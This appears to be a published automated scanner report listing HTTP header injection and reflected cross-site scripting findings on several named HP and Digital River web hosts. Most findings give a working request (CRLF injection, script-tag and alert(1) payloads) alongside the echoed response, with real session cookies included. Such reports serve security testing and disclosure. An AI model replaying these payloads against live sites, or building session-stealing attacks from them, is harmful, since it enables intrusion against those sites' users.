XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, HP.COM HTTP Systems

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

1.1. http://h10025.www1.hp.com/ewfrf/wc/siteHome [REST URL parameter 3] next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h10025.www1.hp.com
Path:	/ewfrf/wc/siteHome

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 5b718%0d%0a73732be924b was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /ewfrf/wc/5b718%0d%0a73732be924b HTTP/1.1
Host: h10025.www1.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Thu, 30 Jun 2011 11:52:07 GMT
Server: Apache
Location: http://h10025.www1.hp.com/ewfrf/wc/5b718
73732be924b?cc=us&lc=en
Content-Length: 0
Cache-Control: max-age=7200
Expires: Thu, 30 Jun 2011 13:52:07 GMT
Connection: close
Content-Type: application/octet-stream

1.2. http://h30415.www3.hp.com/css.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/css.jsp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d4e31%0d%0a13f98e7795b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d4e31%0d%0a13f98e7795b;jsessionid=abcXE0gs2UGqA6THBrJdt?nsid=a-4d123106:130e2c22257:1896 HTTP/1.1
Accept: */*
Referer: http://h30415.www3.hp.com/index.jsp?78db3"><script>alert(document.location)</script>c7cb7310b63=1
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: h30415.www3.hp.com
Cookie: ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 01 Jul 2011 01:19:36 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Location: http://h30415.www3.hp.com/d4e31
13f98e7795b
Content-Length: 346
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://h30415.www3.hp.c
...[SNIP]...

1.3. http://h30415.www3.hp.com/domovoi.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/domovoi.jsp

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7c274%0d%0a51f38aa9df2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7c274%0d%0a51f38aa9df2;jsessionid=abcXE0gs2UGqA6THBrJdt?nsid=a-4d123106:130e2c22257:1896&78db3 HTTP/1.1
Accept: */*
Referer: http://h30415.www3.hp.com/index.jsp?78db3"><script>alert(document.location)</script>c7cb7310b63=1
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: h30415.www3.hp.com
Cookie: ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 01 Jul 2011 01:19:49 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Location: http://h30415.www3.hp.com/7c274
51f38aa9df2
Content-Length: 346
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://h30415.www3.hp.c
...[SNIP]...

1.4. http://h30415.www3.hp.com/skins/hpgateway_skin.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/skins/hpgateway_skin.jsp

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 75f11%0d%0a68e683a9218 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /skins/75f11%0d%0a68e683a9218;jsessionid=abcXE0gs2UGqA6THBrJdt?element=999&nsid=a-4d123106:130e2c22257:1896 HTTP/1.1
Accept: */*
Referer: http://h30415.www3.hp.com/index.jsp?78db3"><script>alert(document.location)</script>c7cb7310b63=1
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: h30415.www3.hp.com
Cookie: ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 01 Jul 2011 01:19:41 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Location: http://h30415.www3.hp.com/skins/75f11
68e683a9218
Content-Length: 352
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://h30415.www3.hp.c
...[SNIP]...

1.5. http://h30415.www3.hp.com/skins/hpgateway_ui.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/skins/hpgateway_ui.jsp

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload e6cfc%0d%0a991aa79e069 was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /skins/e6cfc%0d%0a991aa79e069;jsessionid=abcXE0gs2UGqA6THBrJdt?element=999&nsid=a-4d123106:130e2c22257:1896 HTTP/1.1
Accept: */*
Referer: http://h30415.www3.hp.com/index.jsp?78db3"><script>alert(document.location)</script>c7cb7310b63=1
Accept-Language: en-US
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: h30415.www3.hp.com
Cookie: ARPT=XVIOVMS10.100.129.40CKMWJ; fr_puid=063011_091735485_w4d123106x130e2c22257x1897; frC=1; JSESSIONID=abcXE0gs2UGqA6THBrJdt

Response

HTTP/1.1 301 Moved Permanently
Date: Fri, 01 Jul 2011 01:19:42 GMT
Server: Apache/2.2.17 (Unix) Resin/3.1.6
Location: http://h30415.www3.hp.com/skins/e6cfc
991aa79e069
Content-Length: 352
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://h30415.www3.hp.c
...[SNIP]...

2. Cross-site scripting (reflected) previous next
There are 46 instances of this issue:

http://h10025.www1.hp.com/ewfrf/wc/siteHome [REST URL parameter 3]
http://h20180.www2.hp.com/apps/Lookup [name of an arbitrarily supplied request parameter]
http://h30187.www3.hp.com/ [name of an arbitrarily supplied request parameter]
http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 3]
http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [name of an arbitrarily supplied request parameter]
http://h30187.www3.hp.com/howto_QL_courses.jsp [name of an arbitrarily supplied request parameter]
http://h30187.www3.hp.com/index.jsp [name of an arbitrarily supplied request parameter]
http://h30415.www3.hp.com/index.jsp [name of an arbitrarily supplied request parameter]
http://hp.digitalriver.com/store [name of an arbitrarily supplied request parameter]
http://hp.digitalriver.com/store/hpappli/DisplayHomePage/ [name of an arbitrarily supplied request parameter]
http://hp.digitalriver.com/store/hpappli/DisplayHomePage/www.hp.com/cma/metrics/survey/na_num_clicks.js [name of an arbitrarily supplied request parameter]
http://hp.digitalriver.com/store/hpappli/DisplayHomePage/www8.hp.com/us/en/scripts/baynote.js [name of an arbitrarily supplied request parameter]
https://hp.digitalriver.com/DRHM/store [name%24%2456868 parameter]
https://hp.digitalriver.com/DRHM/store [name%24%2456868 parameter]
https://hp.digitalriver.com/DRHM/store [name%24%2456868 parameter]
https://hp.digitalriver.com/DRHM/store [paymentMethodFee%24%2456868 parameter]
https://hp.digitalriver.com/DRHM/store [pmtMethodValues%24%2456868 parameter]
https://hp.digitalriver.com/store [name of an arbitrarily supplied request parameter]
http://www.shopping.hp.com/accessories-store/computer [REST URL parameter 2]
http://www.shopping.hp.com/accessories-store/handheld [REST URL parameter 2]
http://www.shopping.hp.com/accessories-store/printer [REST URL parameter 2]
http://www.shopping.hp.com/accessories-store/scanner [REST URL parameter 2]
http://www.shopping.hp.com/accessories-store/touchpad [REST URL parameter 2]
http://www.shopping.hp.com/can/computer/categories/ac_adapters/1/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/ac_adapters/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/carrying_cases/1/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/carrying_cases/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/digital_cameras/1/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/docking_solutions/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/home_theater_audio/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/memory/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/mice_keyboards/1/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/mice_keyboards/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/music_devices/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/networking/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/notebook_batteries/1/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/notebook_batteries/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/photo_frames/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/projector_accessories/1/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/storage_solutions/1/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/storage_solutions/2/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/tvs/1/accessories [REST URL parameter 5]
http://www.shopping.hp.com/can/computer/categories/tvs/2/accessories [REST URL parameter 5]
http://h30415.www3.hp.com/domovoi.jsp [User-Agent HTTP header]
http://h30415.www3.hp.com/notenabled.jsp [Referer HTTP header]
http://h30415.www3.hp.com/notenabled.jsp [User-Agent HTTP header]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

2.1. http://h10025.www1.hp.com/ewfrf/wc/siteHome [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h10025.www1.hp.com
Path:	/ewfrf/wc/siteHome

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7e1a"-alert(1)-"1bdf1e3ed6b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /ewfrf/wc/siteHomea7e1a"-alert(1)-"1bdf1e3ed6b HTTP/1.1
Host: h10025.www1.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 30 Jun 2011 11:52:07 GMT
Server: Apache
Cache-Control: max-age=7200
Expires: Thu, 30 Jun 2011 13:52:07 GMT
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 54621

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link
...[SNIP]...
<!--

/* Variables set on all eSupport pages. */
var s_channel="CES";
var s_pageName="CES:404:http://h10025.www1.hp.com/ewfrf/wc/siteHomea7e1a"-alert(1)-"1bdf1e3ed6b?cc=us&lc=en";
var s_pageType="errorPage";
var s_eVar46=s_pageName;
var s_eVar1="us" + '/' + "en" + '/';
var s_eVar29="";
var s_eVar36="";
var s_prop36="D=v36";
var s_prop27="";
var s_eVar49=""
...[SNIP]...

2.2. http://h20180.www2.hp.com/apps/Lookup [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h20180.www2.hp.com
Path:	/apps/Lookup

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba687"%3balert(1)//85ba19ce4a3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ba687";alert(1)//85ba19ce4a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /apps/Lookup?ba687"%3balert(1)//85ba19ce4a3=1 HTTP/1.1
Host: h20180.www2.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 30 Jun 2011 11:52:07 GMT
Server: Apache
Cache-Control: max-age=7200
Expires: Thu, 30 Jun 2011 13:52:07 GMT
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 21990

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-us"><head><meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
...[SNIP]...
m below accordingly
cclang = "en"; // for Customer Care Search REMOVE and USe h_lang and h_cc
lang = "en"; // for global hp Search
cc = "us";
extravars="ba687";alert(1)//85ba19ce4a3=1&lang=en&cc=us";//for extra parameters that are passed in url
if (document.myForm.search[0].checked)
top.location="http://www.hp.com/cgi-bin/cposupport/ccsearch/displayans?qry="+n
...[SNIP]...

2.3. http://h30187.www3.hp.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h30187.www3.hp.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ed0"><script>alert(1)</script>b1637fb8c6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?86ed0"><script>alert(1)</script>b1637fb8c6d=1 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Jun 2011 11:50:02 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:08 GMT
Set-Cookie: hplcpsession.id=b1496b1101920d5068d667cbee35; path=/
Set-Cookie: JSESSIONID=abcCyiekl3YWj57fMyGdt; path=/
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392C1E4830C54ECB49A6E4104218808A781F7C4F8A19AB96069A029839FFE95A122B91AE95A1A2770D491AC17E946292851;PATH=/
Vary: Accept-Encoding
X-Cluster-Member: hplc02.ec2.powered.com
X-Nginx-Member: hplc02.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 66423
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">

<head>
<title>
HP
Learning center
...[SNIP]...
<a class="udrline" href="/index.jsp?printable=true&86ed0"><script>alert(1)</script>b1637fb8c6d=1">
...[SNIP]...

2.4. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://h30187.www3.hp.com
Path:	/campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc3d2"><a>582588b821a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /campus/p/campusIdfc3d2"><a>582588b821a/10640/Graphic_arts.htm HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Jun 2011 11:50:14 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:21 GMT
Set-Cookie: hplcpsession.id=c234741af925107b8347967564a2; path=/
Set-Cookie: JSESSIONID=abcxruyzmghh74alPyGdt; path=/
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE7981C84ADBE837511DA16D6F9C79535DB1B09B6E07A65EF9437E6F5EC2ECBBB0;PATH=/
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
X-Nginx-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 39524
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">

<head>
<title>

HP Learning Cente
...[SNIP]...
<a class="udrline" href="/campus.jsp?printable=true&campusIdfc3d2"><a>582588b821a=10640">
...[SNIP]...

2.5. http://h30187.www3.hp.com/campus/p/campusId/10640/Graphic_arts.htm [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h30187.www3.hp.com
Path:	/campus/p/campusId/10640/Graphic_arts.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5aeb3"><script>alert(1)</script>e1f8533d0b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /campus/p/campusId/10640/Graphic_arts.htm?5aeb3"><script>alert(1)</script>e1f8533d0b0=1 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Jun 2011 11:50:11 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:18 GMT
Set-Cookie: hplcpsession.id=06b121fc06b383be985b55a417dc; path=/
Set-Cookie: JSESSIONID=abcg6SXinHNRAaGqOyGdt; path=/
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38;PATH=/
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 58019
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">

<head>
<title>
HP
Learning center
...[SNIP]...
<a class="udrline" href="/campus.jsp?printable=true&5aeb3"><script>alert(1)</script>e1f8533d0b0=1&campusId=10640">
...[SNIP]...

2.6. http://h30187.www3.hp.com/howto_QL_courses.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h30187.www3.hp.com
Path:	/howto_QL_courses.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d01bb"><script>alert(1)</script>aeeea85d069 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /howto_QL_courses.jsp?d01bb"><script>alert(1)</script>aeeea85d069=1 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Jun 2011 11:50:22 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:29 GMT
Set-Cookie: hplcpsession.id=9c06a5c800c9ac93012b4e2e1d6a; path=/
Set-Cookie: JSESSIONID=abc82crmdwcxJcO3QyGdt; path=/
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE329D793A0893209B7FF2B452EF1B2ED94DDDD94D05B094A1F5996E33B31E8F38;PATH=/
Vary: Accept-Encoding
X-Cluster-Member: hplc04.ec2.powered.com
X-Nginx-Member: hplc04.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 361891
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">

<head>
<title>
HP
Learning center
...[SNIP]...
<a class="udrline" href="/howto_QL_courses.jsp?d01bb"><script>alert(1)</script>aeeea85d069=1&printable=true">
...[SNIP]...

2.7. http://h30187.www3.hp.com/index.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h30187.www3.hp.com
Path:	/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfb26"><script>alert(1)</script>5f3c13adc20 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.jsp?cfb26"><script>alert(1)</script>5f3c13adc20=1 HTTP/1.1
Host: h30187.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Cache-control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
Date: Thu, 30 Jun 2011 11:50:03 GMT
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Server: nginx
Set-Cookie: hplcpsession.login.id=#1bawFF1KqfIZziB9F7w3Sg==; path=/; expires=Tue, 18-Jul-2079 15:04:10 GMT
Set-Cookie: hplcpsession.id=21fe011d92cfcff675c2dbf1d750; path=/
Set-Cookie: JSESSIONID=abcoSu5SvO4NF5HzMyGdt; path=/
Set-Cookie: AWSELB=4F73FBE30E806C9AB382F44EF431EF17B4CB7DA392D3B513E43AC6E7139EAB98CC3DDED3DE7981C84ADBE837511DA16D6F9C79535DB1B09B6E07A65EF9437E6F5EC2ECBBB0;PATH=/
Vary: Accept-Encoding
X-Cluster-Member: hplc03.ec2.powered.com
X-Nginx-Member: hplc03.ec2.powered.com
XDomainRequestAllowed: 1
Content-Length: 66503
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">

<head>
<title>
HP
Learning center
...[SNIP]...
<a class="udrline" href="/index.jsp?printable=true&cfb26"><script>alert(1)</script>5f3c13adc20=1">
...[SNIP]...

2.8. http://h30415.www3.hp.com/index.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://h30415.www3.hp.com
Path:	/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78db3"><script>alert(1)</script>c7cb7310b63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.jsp?78db3"><script>alert(1)</script>c7cb7310b63=1 HTTP/1.1
Host: h30415.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
